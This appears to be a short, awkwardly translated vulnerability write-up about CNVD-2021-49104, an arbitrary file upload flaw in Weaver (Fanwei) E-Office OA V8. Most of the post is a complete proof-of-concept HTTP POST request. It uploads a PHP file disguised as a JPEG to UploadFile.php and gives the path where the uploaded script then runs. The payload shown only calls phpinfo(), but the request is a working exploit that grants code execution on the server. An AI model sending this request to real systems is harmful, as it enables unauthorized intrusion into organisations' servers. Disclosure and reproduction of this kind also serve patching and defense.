Fanwei Oa E Office Uploadfile Php Arbitrary File Upload Vulnerability Cnvd 2021 49104
Fanwei Oa E Office Uploadfile Php Arbitrary File Upload Vulnerability Cnvd 2021 49104
Panwei OA E-Office UploadFile.php Any file upload vulnerability CNVD-2021-49104
Vulnerability Description
Uploading files in /general/index/UploadFile.php is not strictly filtered, allowing unlimited upload of files. Attackers can directly obtain website permissions through this vulnerability
Vulnerability Impact
Panwei OA V8
Network surveying and mapping
Vulnerability reappears
Login page
Send a request packet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
Visit again
1
/images/logo/logo-eoffice.php
This post is licensed under CC BY 4.0 by the author.